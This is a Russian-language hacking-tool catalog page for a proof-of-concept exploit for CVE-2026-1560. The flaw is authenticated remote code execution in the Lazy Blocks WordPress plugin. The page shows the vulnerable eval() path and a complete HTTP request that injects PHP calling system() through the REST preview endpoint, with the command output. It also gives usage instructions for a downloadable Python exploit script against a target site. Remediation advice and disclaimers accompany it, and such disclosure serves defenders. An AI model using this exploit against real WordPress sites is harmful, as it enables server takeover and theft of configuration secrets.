Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/z3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubz3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0

CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0

Доказательство концепции эксплуатации для CVE-2026-1560, аутентифицированной уязвимости удалённого выполнения кода в плагине Lazy Blocks для WordPress, позволяющей пользователям с низкими привилегиями выполнять произвольный PHP через REST API.

Репозиторий
26 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-1560 – Аутентифицированное удалённое выполнение кода в Custom Block Builder – Lazy Blocks ≤ 4.2.0

Исследователь: ZeYrOXxx

Плагин: Custom Block Builder – Lazy Blocks

Затронутые версии: ≤ 4.2.0

Серьёзность: Высокая

CVSS: 8.8

Тип уязвимости: Аутентифицированное удалённое выполнение кода (RCE)

Вектор атаки: REST API

Требуемые привилегии: edit_posts (Contributor+)


Ссылки

  • Консультация Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lazy-blocks/custom-block-builder-lazy-blocks-420-authenticated-contributor-remote-code-execution

Краткое описание

В плагине Custom Block Builder – Lazy Blocks для WordPress была выявлена уязвимость высокой степени серьёзности, затрагивающая версии вплоть до 4.2.0 включительно.
Уязвимость позволяет аутентифицированным пользователям с низкими привилегиями (роль Contributor) выполнять произвольный PHP-код на сервере через конечную точку REST API, предназначенную для предпросмотра блоков.

Эта проблема полностью нарушает модель привилегий WordPress и может привести к .

полной компрометации сервера

Уязвимая конечная точка

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/

Конечная точка доступна любому аутентифицированному пользователю с возможностью edit_posts.


Технические детали

Проверка разрешений

Маршрут REST зарегистрирован со слабым обратным вызовом проверки разрешений:

root@kitploit:~
'permission_callback' => array( $this, 'block_builder_preview_permission' )

Это включает пользователей с ролью Contributor, которым никогда не должно быть разрешено выполнять PHP-код.


Уязвимый путь выполнения кода

REST-контроллер – classes/class-rest.php

root@kitploit:~
$block = $request->get_param( 'block' );

$block_result = lazyblocks()->blocks()->render_callback(
    $attributes,
    null,
    null,
    $context,
    $block_data
);

Рендерер блоков – classes/class-blocks.php

root@kitploit:~
public function php_eval( $code, $attributes, $context ) {
    ob_start();
    eval( '?>' . $code );
    return ob_get_clean();
}

Функция eval() выполняет PHP-код, контролируемый атакующим, без санитизации или проверки.


Анализ первопричины

Lazy Blocks позволяет использовать пользовательскую PHP-логику рендеринга для блоков.
Конечная точка предпросмотра REST API принимает определения блоков, предоставленные пользователем, и не различает доверенные сохранённые блоки и блоки предпросмотра, контролируемые атакующим.

Внедряя упрощённые атрибуты блоков, такие как:

  • code_output_method
  • code_editor_html

атакующий может достичь точки выполнения php_eval() и запустить произвольный PHP-код.


Доказательство концепции (HTTP)

Запрос:

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/ HTTP/1.1
Host: example.com
Content-Type: application/json
Authorization: Basic [Contributor_Credentials]

{
    "context": "editor",
    "block": {
        "slug": "exploit-block",
        "code_output_method": "php",
        "code_editor_html": "<?php echo 'VULNERABLE: ' . system('id'); ?>"
    }
}

Ответ:

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/json

{
    "success": true,
    "response": "<div useBlockProps>VULNERABLE: uid=33(www-data)...</div>"
}

✔ Выполнение произвольных команд подтверждено


Данное PoC предоставлено строго в целях тестирования безопасности и исследовательских целях.


Воздействие

Атакующий с доступом Contributor может:

  • Выполнять произвольные системные команды
  • Читать конфиденциальные файлы (например, wp-config.php)
  • Изменять исходные файлы PHP
  • Повышать привилегии до администратора
  • Полностью скомпрометировать экземпляр WordPress

Устранение уязвимости

  • Ограничить PHP-рендеринг только для администраторов
  • Удалить использование eval() для ввода, контролируемого пользователем
  • Запретить предпросмотр блоков, содержащих PHP-код, через REST
  • Требовать возможность manage_options или unfiltered_html
  • Заменить выполнение PHP безопасными механизмами шаблонизации

Использование (PoC на Python)

Требования

  • Python 3.x
  • Библиотека requests
  • Действительные учётные данные WordPress с возможностью edit_posts (Contributor+)

Установка зависимости

root@kitploit:~
pip install requests

Запуск эксплойта

root@kitploit:~
python3 poc.py <target_url> <username> <password> "<command>"

Пример

root@kitploit:~
python3 poc.py https://victim.site contributor password "id"

Если цель уязвима, вывод команды будет возвращён в HTTP-ответе.

⚠️ Данное доказательство концепции предназначено строго для авторизованного тестирования безопасности и исследовательских целей.

Скачать инструмент